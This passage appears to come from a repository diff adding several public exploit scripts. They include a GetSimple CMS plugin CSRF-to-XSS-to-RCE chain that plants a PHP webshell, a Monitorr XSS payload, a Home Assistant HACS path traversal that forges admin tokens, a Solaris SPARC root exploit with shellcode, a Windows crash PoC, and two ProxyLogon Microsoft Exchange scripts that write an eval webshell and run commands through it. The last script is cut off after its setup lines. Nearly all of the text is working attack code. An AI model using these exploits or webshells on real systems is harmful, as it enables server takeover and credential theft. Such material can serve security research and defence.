payload += 'xhr1.onreadystatechange=function(){'
payload += 'if(xhr1.readyState==4 \\x26\\x26 xhr1.status==200){'
payload += 'r=this.responseXML;'
payload += 'nVal=r.querySelector(\\x22#nonce\\x22).value;'
payload += 'eVal=r.forms[1][2].defaultValue;'
payload += 'xhr2.open(\\x22POST\\x22,u,true);'
payload += 'xhr2.setRequestHeader(\\x22Content-Type\\x22,h);'
# for the $_REQUEST[solarflare] used for the webshell via shell_exec(), hex-escape the $ or else it will render in the PHP engine to early in the exploit chain
payload += 'payload=e(\\x22\\x3c?php echo shell_exec(\\x24_REQUEST[solarflare]) ?\\x3e\\x22);'
payload += 'params=\\x22nonce=\\x22+nVal+\\x22\\x26content=\\x22+payload+\\x22\\x26edited_file=\\x22+eVal+\\x22\\x26submitsave=Save+Changes\\x22;'
payload += 'xhr2.send(params);'
payload += '}};'
payload += 'xhr1.open(\\x22GET\\x22,u,true);'
payload += 'xhr1.responseType=\\x22document\\x22;'
payload += 'xhr1.send();'
hexBreakoutClose = '\\x3c/script\\x3e'
return hexBreakoutOpen + payload + hexBreakoutClose
def csrfPayload():
payload = '<body><form action="'+target+'/admin/load.php?id=my-smtp-contact" method="POST">'
payload += '<input type="hidden" name="act" value="addsettings">'
payload += '<input type="hidden" name="m_smtp_c_language" value="en.php">'
payload += '<input type="hidden" name="m_smtp_c_sender_name" value="'+xhrRcePayload()+'">'
payload += '<input type="hidden" name="my_smtp_c_selected_dir" value="395ed33a5ae4476">'
payload += '<input type="submit" value="Submit request">'
payload += '</form><body>'
return payload
class S(BaseHTTPRequestHandler):
def do_GET(self):
victim = self.client_address
victim = "{}:{}".format(victim[0],victim[1])
print("{} connected to Malicious CSRF Site!".format(victim))
self.wfile.write("{}".format(csrfPayload()).encode('utf-8'))
def run(server_class=HTTPServer, handler_class=S, port=80):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
print('{}Hosting CSRF attack & listening for admin to connect..'.format(info))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Stopping httpd...')
def tryUploadWebshell(target,page):
try:
blind = target+page
# The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt)
webshUpload = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"}
requests.post(url=blind, data=webshUpload, verify=False)
except:
pass
def checkWebshell(target):
try:
websh = "{}/webshell.php".format(target)
capsule = {'FierceGodKick':'pwnt?'}
resp = requests.post(url=websh, data=capsule, verify=False)
return resp.status_code
except:
pass
def sig():
SIG = SB+FY+" .-----.._ ,--.\n"
SIG += FY+" | .. > ___ | | .--.\n"
SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __\n"
SIG += FY+" | </ "+FR+"* * *"+FY+" \ / \\/ \\\n"
SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\\n"
SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\\n"
SIG += FY+" _______"+FR+"github.com/boku7"+FY+"_____\n"+ST
return SIG
def argsetup():
about = SB+FB+' The My SMTP Contact v1.1.2 plugin for GetSimple CMS suffers from a Stored Cross-Site Scripting (XSS) vulnerability, that when chained together with the CSRF vulnerability in v1.1.1, allows remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website.\n'+ST
about += SB+FC+' CVSS Base Score'+FT+':'+FR+' 9.6 '+FT+'|'+FC+' CVSS v3.1 Vector'+FT+':'+FR+' AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+FC
parser = argparse.ArgumentParser(description=about, formatter_class=argparse.RawTextHelpFormatter)
desc1 = ST+FC+'Routable domain name of the target GetSimple CMS instance'+SB
parser.add_argument('Target',type=str,help=desc1)
desc2 = ST+FC+'Path to the public page which implements the CMS theme'+ST
parser.add_argument('PublicPage',type=str,help=desc2)
args = parser.parse_args()
return args
if __name__ == '__main__':
header = SB+FR+' My SMTP Contact GetSimple CMS Plugin\n'
header += SB+FM+'CSRF '+FT+'-->'+FM+' Stored XSS '+FT+'-->'+FM+' XHR PHP Code Injection '+FT+'-->'+FM+' RCE\n'+ST
header += SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke\n'+ST
print(header)
args = argsetup()
target = args.Target
page = args.PublicPage
print(sig())
theTHREADER()
pwnt = checkWebshell(target)
if pwnt != 200:
while pwnt != 200:
sleep(3)
tryUploadWebshell(target,page)
sleep(2)
pwnt = checkWebshell(target)
print("{} A wild webshell appears!".format(ok))
webshell(target)

25
exploits/php/webapps/49806.txt Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: Montiorr 1.7.6m - Persistent Cross-Site Scripting
# Date: 25/4/2021
# Exploit Author: Ahmad Shakla
# Software Link: https://github.com/Monitorr/Monitorr
# Tested on: Kali GNU/Linux 2020.2
# Detailed Bug Description : https://arabcyberclub.blogspot.com/2021/04/monitor-176m-file-upload-to-xss.html
An attacker can preform an XSS attack via image upload
Steps :
1)Create a payload with the following format :
><img src=x onerror=alert("XSS")>.png
2) Install the database by going to the following link :
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/_install.php
3)Register for a new account on the server by going to the following link :
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php?action=register
4)Login with your credentials on the following link :
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php
5)Go to the following link and upload the payload :
https://monitorr.robyns-petshop.thm/settings.php#services-configuration

86
exploits/python/webapps/49495.py Executable file
View file

@ -0,0 +1,86 @@
# Exploit Title: Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover
# Date: 2021-01-28
# Exploit Author: Lyghtnox
# Vendor Homepage: https://www.home-assistant.io/
# Software Link: https://github.com/hacs/integration
# Version: < 1.10.0
# Tested on: Raspbian + Home Assistant 2021.1.0
# Blog post: https://lyghtnox.gitlab.io/posts/hacs-exploit/
# STEP 1: Run the exploit (python3 exploit.py host port)
# STEP 2: Copy the token printed and set in your browser's local storage with
# the key `hassTokens`
import requests
import jwt
import json
import argparse
class HA:
def __init__(self, ip, port):
self.ip = ip
self.port = port
def retrieveFile(self, f):
url = f'http://{self.ip}:{self.port}/hacsfiles/../../{f}'
with requests.Session() as s:
r = requests.Request(method='GET', url=url)
prep = r.prepare()
prep.url = url
try:
r = s.send(prep, verify=False)
except requests.exceptions.ConnectionError:
return
if r.status_code == 400 or r.status_code == 404:
return
return r
def craftToken(self):
f = self.retrieveFile('.storage/auth').json()
# Find owner
for user in f['data']['users']:
if user['is_owner']:
self.owner = user['id']
break
else:
print("No owner found. Using first account")
self.owner = f['data']['users'][0]['id']
for token in f['data']['refresh_tokens']:
if self.owner == token['user_id']:
encoded_jwt = jwt.encode({'iss': token['id']},
token['jwt_key'],
algorithm="HS256")
self.token = {'access_token': encoded_jwt,
'token_type': 'Bearer',
'refresh_token': token['token'],
'expires_in': 1800,
'hassUrl': f"http://{self.ip}:{self.port}",
'clientId': token['client_id']}
return self.token
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Exploit a vulnerability in \
HACS < 1.10.0 to gain admin access to an Home Assistant instance.")
parser.add_argument("host", type=str, help="IP of the HASS instance")
parser.add_argument("port", type=int, help="port of the HASS instance")
args = parser.parse_args()
r = requests.get('http://{ip}:{port}/hacsfiles/iconset.js'.format(
ip=args.host,
port=args.port))
if r.status_code != 404:
print("HACS found! Testing vulnerability...", end='', flush=True)
ha = HA(args.host, args.port)
if ha.retrieveFile('configuration.yaml'):
print(": VULNERABLE")
token = ha.craftToken()
if token:
print(f"Use the following 'hassTokens': {json.dumps(token)}")
else:
print("Unable to craft token")
else:
print(": Not vulnerable")

437
exploits/solaris/local/49518.c Normal file
View file

@ -0,0 +1,437 @@
# Exploit Title: Solaris 10 1/13 (SPARC) - 'dtprintinfo' Local Privilege Escalation (3)
# Date: 2021-02-01
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.oracle.com/solaris/solaris10/
# Version: Solaris 10
# Tested on: Solaris 10 1/13 SPARC
/*
* raptor_dtprintname_sparc3.c - dtprintinfo on Solaris 10 SPARC
* Copyright (c) 2004-2020 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* 0day buffer overflow in the dtprintinfo(1) CDE Print Viewer, leading to
* local root. Many thanks to Dave Aitel for discovering this vulnerability
* and for his interesting research activities on Solaris/SPARC.
*
* "None of my dtprintinfo work is public, other than that 0day pack being
* leaked to all hell and back. It should all basically still work. Let's
* keep it that way, cool? :>" -- Dave Aitel
*
* This is a revised version of my original exploit that should work on
* modern Solaris 10 SPARC boxes. I had to figure out a new way to obtain
* the needed addresses that's hopefully universal (goodbye VOODOO macros!).
* and I had to work around some annoying crashes, which led me to write
* a custom shellcode that makes /bin/ksh setuid. Crude but effective;)
* If you feel brave, you can also try my experimental exec shellcode, for
* SPARC V8 plus and above architectures only ("It works on my computer!").
*
* I'm developing my exploits on a Solaris 10 Branded Zone and I strongly
* suspect this is the reason for the weird behavior in the execution of
* standard SYS_exec shellcodes, because the crash happens in s10_brand.so.1,
* in the strncmp() function called by brand_uucopystr(). If that's indeed
* the case, any shellcode (including lsd-pl.net's classic shellcode) should
* work on physical systems and I just spent a non-neglibible amount of time
* debugging this for no valid reason but my love of hacking... Oh well!
*
* Usage:
* $ gcc raptor_dtprintname_sparc3.c -o raptor_dtprintname_sparc3 -Wall
* [on your xserver: disable the access control]
* $ ./raptor_dtprintname_sparc3 10.0.0.122:0
* [...]
* $ ls -l /bin/ksh
* -rwsrwsrwx 3 root bin 209288 Feb 21 2012 /bin/ksh
* $ /bin/ksh
* # id
* uid=100(user) gid=1(other) euid=0(root) egid=2(bin)
* #
*
* Tested on:
* SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise (Solaris 10 1/13)
*/
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#define INFO1 "raptor_dtprintname_sparc3.c - dtprintinfo on Solaris 10 SPARC"
#define INFO2 "Copyright (c) 2004-2020 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/dtprintinfo" // the vulnerable program
#define BUFSIZE 301 // size of the printer name
#define FFSIZE 64 + 1 // size of the fake frame
#define DUMMY 0xdeadbeef // dummy memory address
//#define USE_EXEC_SC // uncomment to use exec shellcode
#ifdef USE_EXEC_SC
char sc[] = /* Solaris/SPARC execve() shellcode (12 + 48 = 60 bytes) */
/* setuid(0) */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
"\x82\x10\x20\x17" /* mov 0x17, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
/* execve("/bin/ksh", argv, NULL) */
"\x9f\x41\x40\x01" /* rd %pc,%o7 ! >= sparcv8+ */
"\x90\x03\xe0\x28" /* add %o7, 0x28, %o0 */
"\x92\x02\x20\x10" /* add %o0, 0x10, %o1 */
"\xc0\x22\x20\x08" /* clr [ %o0 + 8 ] */
"\xd0\x22\x20\x10" /* st %o0, [ %o0 + 0x10 ] */
"\xc0\x22\x20\x14" /* clr [ %o0 + 0x14 ] */
"\x82\x10\x20\x0b" /* mov 0xb, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x80\x1c\x40\x11" /* xor %l1, %l1, %g0 ! nop */
"\x41\x41\x41\x41" /* placeholder */
"/bin/ksh";
#else
char sc[] = /* Solaris/SPARC chmod() shellcode (12 + 32 + 20 = 64 bytes) */
/* setuid(0) */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
"\x82\x10\x20\x17" /* mov 0x17, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
/* chmod("/bin/ksh", 037777777777) */
"\x92\x20\x20\x01" /* sub %g0, 1, %o1 */
"\x20\xbf\xff\xff" /* bn,a <sc - 4> */
"\x20\xbf\xff\xff" /* bn,a <sc> */
"\x7f\xff\xff\xff" /* call <sc + 4> */
"\x90\x03\xe0\x20" /* add %o7, 0x20, %o0 */
"\xc0\x22\x20\x08" /* clr [ %o0 + 8 ] */
"\x82\x10\x20\x0f" /* mov 0xf, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
/* exit(0) */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
"\x82\x10\x20\x01" /* mov 1, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh";
#endif /* USE_EXEC_SC */
/* globals */
char *arg[2] = {"foo", NULL};
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_zero(int addr, char *pattern);
int get_ff_addr(char *path, char **argv);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], ff[FFSIZE], ret_var[16], fpt_var[16];
char platform[256], release[256], display[256];
int i, ff_addr, sc_addr, ret_pos, fpt_pos;
int sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
int ret = search_ldso("sprintf");
int rwx_mem = search_rwx_mem() + 24; /* stable address */
/* fake lpstat code */
if (!strcmp(argv[0], "lpstat")) {
/* check command line */
if (argc != 2)
exit(1);
/* get ret and fake frame addresses from environment */
ret = (int)strtoul(getenv("RET"), (char **)NULL, 0);
ff_addr = (int)strtoul(getenv("FPT"), (char **)NULL, 0);
/* prepare the evil printer name */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
/* fill with return and fake frame addresses */
for (i = 0; i < BUFSIZE; i += 4) {
/* apparently, we don't need to bruteforce */
set_val(buf, i, ret - 4);
set_val(buf, i += 4, ff_addr);
}
/* print the expected output and exit */
if(!strcmp(argv[1], "-v")) {
fprintf(stderr, "lpstat called with -v\n");
printf("device for %s: /dev/null\n", buf);
} else {
fprintf(stderr, "lpstat called with -d\n");
printf("system default destination: %s\n", buf);
}
exit(0);
}
/* helper program that prints argv[0] address, used by get_ff_addr() */
if (!strcmp(argv[0], "foo")) {
printf("0x%p\n", argv[0]);
exit(0);
}
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* process command line */
if (argc != 2) {
#ifdef USE_EXEC_SC
fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
#else
fprintf(stderr, "usage:\n$ %s xserver:display\n$ /bin/ksh\n\n", argv[0]);
#endif /* USE_EXEC_SC */
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);
/* prepare the fake frame */
bzero(ff, sizeof(ff));
for (i = 0; i < 64; i += 4) {
set_val(ff, i, DUMMY);
}
/* fill the envp, keeping padding */
sc_addr = add_env(ff);
add_env(sc);
ret_pos = env_pos;
add_env("RET=0x41414141"); /* placeholder */
fpt_pos = env_pos;
add_env("FPT=0x42424242"); /* placeholder */
add_env(display);
add_env("PATH=.:/usr/bin");
add_env("HOME=/tmp");
add_env(NULL);
/* calculate the needed addresses */
ff_addr = get_ff_addr(VULN, argv);
sc_addr += ff_addr;
/*
* populate saved %l registers
*/
set_val(ff, i = 0, ff_addr + 56); /* %l0 */
set_val(ff, i += 4, ff_addr + 56); /* %l1 */
set_val(ff, i += 4, ff_addr + 56); /* %l2 */
set_val(ff, i += 4, ff_addr + 56); /* %l3 */
set_val(ff, i += 4, ff_addr + 56); /* %l4 */
set_val(ff, i += 4, ff_addr + 56); /* %l5 */
set_val(ff, i += 4, ff_addr + 56); /* %l6 */
set_val(ff, i += 4, ff_addr + 56); /* %l7 */
/*
* populate saved %i registers
*/
set_val(ff, i += 4, rwx_mem); /* %i0: 1st arg to sprintf() */
set_val(ff, i += 4, sc_addr); /* %i1: 2nd arg to sprintf() */
set_val(ff, i += 4, ff_addr + 56); /* %i2 */
set_val(ff, i += 4, ff_addr + 56); /* %i3 */
set_val(ff, i += 4, ff_addr + 56); /* %i4 */
set_val(ff, i += 4, ff_addr + 56); /* %i5 */
set_val(ff, i += 4, sb - 1024); /* %i6: frame pointer */
set_val(ff, i += 4, rwx_mem - 8); /* %i7: return address */
#ifdef USE_EXEC_SC
set_val(sc, 48, sb - 1024); /* populate exec shellcode placeholder */
#endif /* USE_EXEC_SC */
/* overwrite RET and FPT env vars with the correct addresses */
sprintf(ret_var, "RET=0x%x", ret);
env[ret_pos] = ret_var;
sprintf(fpt_var, "FPT=0x%x", ff_addr);
env[fpt_pos] = fpt_var;
/* create a symlink for the fake lpstat */
unlink("lpstat");
symlink(argv[0], "lpstat");
/* print some output */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr);
fprintf(stderr, "Using sprintf() address\t: 0x%p\n\n", (void *)ret);
/* check for null bytes (add some padding to env if needed) */
check_zero(ff_addr, "ff address");
check_zero(sc_addr, "sc address");
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(1);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return env_len;
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return env_len;
}
/*
* check_zero(): check an address for the presence of a 0x00
*/
void check_zero(int addr, char *pattern)
{
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "error: %s contains a 0x00!\n", pattern);
exit(1);
}
}
/*
* get_ff_addr(): get fake frame address using a helper program
*/
int get_ff_addr(char *path, char **argv)
{
char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
char hex[11] = "\x00";
int fd[2], addr;
/* truncate program name at correct length and create a hard link */
prog[strlen(path)] = 0x0;
unlink(prog);
link(argv[0], prog);
/* open pipe to read program output */
if (pipe(fd) < 0) {
perror("pipe");
exit(1);
}
switch(fork()) {
case -1: /* cannot fork */
perror("fork");
exit(1);
case 0: /* child */
dup2(fd[1], 1);
close(fd[0]);
close(fd[1]);
execve(prog, arg, env);
perror("execve");
exit(1);
default: /* parent */
close(fd[1]);
read(fd[0], hex, sizeof(hex));
break;
}
/* check and return address */
if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) {
fprintf(stderr, "error: cannot read ff address from helper program\n");
exit(1);
}
return addr + 4;
}
/*
* search_ldso(): search for a symbol inside ld.so.1
*/
int search_ldso(char *sym)
{
int addr;
void *handle;
Link_map *lm;
/* open the executable object file */
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
perror("dlopen");
exit(1);
}
/* get dynamic load information */
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
perror("dlinfo");
exit(1);
}
/* search for the address of the symbol */
if ((addr = (int)dlsym(handle, sym)) == NULL) {
fprintf(stderr, "error: sorry, function %s() not found\n", sym);
exit(1);
}
/* close the executable object file */
dlclose(handle);
check_zero(addr - 4, sym);
return addr;
}
/*
* search_rwx_mem(): search for an RWX memory segment valid for all
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
*/
int search_rwx_mem(void)
{
int fd;
char tmp[16];
prmap_t map;
int addr = 0, addr_old;
/* open the proc filesystem */
sprintf(tmp,"/proc/%d/map", (int)getpid());
if ((fd = open(tmp, O_RDONLY)) < 0) {
fprintf(stderr, "error: can't open %s\n", tmp);
exit(1);
}
/* search for the last RWX memory segment before stack (last - 1) */
while (read(fd, &map, sizeof(map)))
if (map.pr_vaddr)
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
addr_old = addr;
addr = map.pr_vaddr;
}
close(fd);
/* add 4 to the exact address null bytes */
if (!(addr_old & 0xff))
addr_old |= 0x04;
if (!(addr_old & 0xff00))
addr_old |= 0x0400;
return addr_old;
}
/*
* set_val(): copy a dword inside a buffer
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0xff000000) >> 24;
buf[pos + 1] = (val & 0x00ff0000) >> 16;
buf[pos + 2] = (val & 0x0000ff00) >> 8;
buf[pos + 3] = (val & 0x000000ff);
}

29
exploits/windows/dos/49638.py Executable file
View file

@ -0,0 +1,29 @@
# Exploit Title: Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)
# Exploit Author : Enes Özeser
# Exploit Date: 2021-02-28
# Vendor Homepage : https://www.nsauditor.com/
# Link Software : https://www.nsauditor.com/downloads/nhsi_setup.exe
# Version: 1.6.4.0
# Tested on: Windows 10
# Steps:
1- Run the python script. (payload.py)
2- Open payload.txt and copy content to clipboard.
3- Run 'Nsasoft Hardware Software Inventory 1.6.4.0'.
4- Register -> Enter Registeration Code
5- Paste clipboard into the "Key" or "Name".
6- Click on OK.
7- Crashed.
---> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 300
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print "File created!"
except:
print "File cannot be created!"

183
exploits/windows/remote/49663.py Executable file
View file

@ -0,0 +1,183 @@
import requests
from urllib3.exceptions import InsecureRequestWarning
import random
import string
import sys
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
if len(sys.argv) < 2:
print("使用方式: python PoC.py <target> <email>")
print("使用方式: python PoC.py mail.btwaf.cn test2@btwaf.cn")
exit()
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
target = sys.argv[1]
email = sys.argv[2]
random_name = id_generator(4) + ".js"
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test11.aspx"
shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path
# webshell-马子内容
shell_content = '<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["code"],"unsafe");}</script>'
autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
""" % email
print("正在获取Exchange Server " + target+"权限")
print("=============================")
FQDN = "EXCHANGE01"
ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522",
"User-Agent": user_agent},
verify=False,proxies=proxies)
if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:
FQDN = ct.headers["X-FEServer"]
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN,
"Content-Type": "text/xml",
"User-Agent": user_agent},
data=autoDiscoverBody,
proxies=proxies,
verify=False
)
if ct.status_code != 200:
print(ct.status_code)
print("Autodiscover Error!")
exit()
if "<LegacyDN>" not in str(ct.content):
print("Can not get LegacyDN!")
exit()
legacyDn = str(ct.content).split("<LegacyDN>")[1].split(r"</LegacyDN>")[0]
print("Got DN: " + legacyDn)
mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=Administrator@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN,
"Content-Type": "application/mapi-http",
"X-Requesttype": "Connect",
"X-Clientinfo": "{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}",
"X-Clientapplication": "Outlook/15.0.4815.1002",
"X-Requestid": "{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456",
"User-Agent": user_agent
},
data=mapi_body,
verify=False,
proxies=proxies
)
if ct.status_code != 200 or "act as owner of a UserMailbox" not in str(ct.content):
print("Mapi Error!")
exit()
sid = str(ct.content).split("with SID ")[1].split(" and MasterAccountSid")[0]
print("Got SID: " + sid)
sid = sid.replace(sid.split("-")[-1],"500")
proxyLogon_request = """<r at="Negotiate" ln="john"><s>%s</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="7" t="1">S-1-5-15</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r>
""" % sid
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=Administrator@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN,
"Content-Type": "text/xml",
"msExchLogonMailbox": "S-1-5-20",
"User-Agent": user_agent
},
data=proxyLogon_request,
proxies=proxies,
verify=False
)
if ct.status_code != 241 or not "set-cookie" in ct.headers:
print("Proxylogon Error!")
exit()
sess_id = ct.headers['set-cookie'].split("ASP.NET_SessionId=")[1].split(";")[0]
msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0]
print("Got session id: " + sess_id)
print("Got canary: " + msExchEcpCanary)
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
"Content-Type": "application/json; ",
"msExchLogonMailbox": "S-1-5-20",
"User-Agent": user_agent
},
json={"filter": {
"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"SelectedView": "", "SelectedVDirType": "All"}}, "sort": {}},
verify=False
)
if ct.status_code != 200:
print("GetOAB Error!")
exit()
oabId = str(ct.content).split('"RawIdentity":"')[1].split('"')[0]
print("Got OAB id: " + oabId)
oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
"properties": {
"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"ExternalUrl": "http://ffff/#%s" % shell_content}}}
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
"msExchLogonMailbox": "S-1-5-20",
"Content-Type": "application/json; charset=utf-8",
"User-Agent": user_agent
},
json=oab_json,
verify=False
)
if ct.status_code != 200:
print("Set external url Error!")
exit()
reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
"properties": {
"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"FilePathName": shell_absolute_path}}}
ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
"Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
"msExchLogonMailbox": "S-1-5-20",
"Content-Type": "application/json; charset=utf-8",
"User-Agent": user_agent
},
json=reset_oab_body,
verify=False
)
if ct.status_code != 200:
print("写入shell失败了啊")
exit()
print("成功了。马上就验证shell是否OK!")
print("POST shell:https://"+target+"/owa/auth/test11.aspx")
shell_url="https://"+target+"/owa/auth/test11.aspx"
print('code=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami").StdOut.ReadAll());')
print("正在请求shell")
data=requests.post(shell_url,data={"code":"Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"whoami\").StdOut.ReadAll());"},verify=False)
if data.status_code != 200:
print("写入shell失败")
else:
print("权限如下:"+data.text.split("OAB (Default Web Site)")[0].replace("Name : ",""))

176
exploits/windows/webapps/49637.py Executable file
View file

@ -0,0 +1,176 @@
# Exploit Title: Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)
# Date: 2021-03-10
# Exploit Author: testanull
# Vendor Homepage: https://www.microsoft.com
# Version: MS Exchange Server 2013, 2016, 2019
# CVE: 2021-26855, 2021-27065
import requests
from urllib3.exceptions import InsecureRequestWarning
import random
import string
import sys
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
if len(sys.argv) < 2:
print("Usage: python PoC.py <target> <email>")
print("Example: python PoC.py mail.evil.corp haxor@evil.corp")
exit()
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
target = sys.argv[1]
email = sys.argv[2]
random_name = id_generator(3) + ".js"
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
